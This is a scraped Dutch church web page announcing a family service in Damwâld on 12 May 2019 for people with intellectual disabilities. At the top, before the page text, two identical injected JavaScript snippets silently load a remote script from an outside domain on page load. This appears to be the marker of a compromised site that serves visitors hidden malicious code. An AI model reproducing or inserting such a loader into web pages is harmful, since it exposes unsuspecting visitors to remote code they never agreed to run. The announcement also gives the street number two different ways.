;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bijzondere gezinsdienst ... uitnodiging ! - PKN Damwâld
12 mei 2019
14:00 t/m 15:00
de Ontmoeting
Bijzondere gezinsdienst … uitnodiging !

Zondagmiddag 12 mei 2019 wordt  in de Gereformeerde kerk De Ontmoeting, Foarwei 48 in Damwâld, weer  een bijzondere gezinsdienst gehouden. De dienst begint om 14.00 uur. Ds. S. Boukes gaat in op het thema ‘Adam en Eva’. De gospelband SIGN werkt mee aan de dienst Van harte welkom !

Geregeld wordt in een aantal kerken in Damwâld en omgeving aangepaste gezinsdiensten gehouden die met name gericht zijn op de mensen met een verstandelijke beperking. Deze diensten, waarvan er gemiddeld 5 per jaar zijn, worden beurtelings verzorgd door één van de kerken die zijn vertegenwoordigd in de Commissie Gezinsdiensten. Deze diensten kenmerken zich door de heldere en zeer begrijpelijk taal en zijn ook uitermate geschikt voor kinderen.

Locatie: de OntmoetingFoarwei 38, 9104 BX Damwâld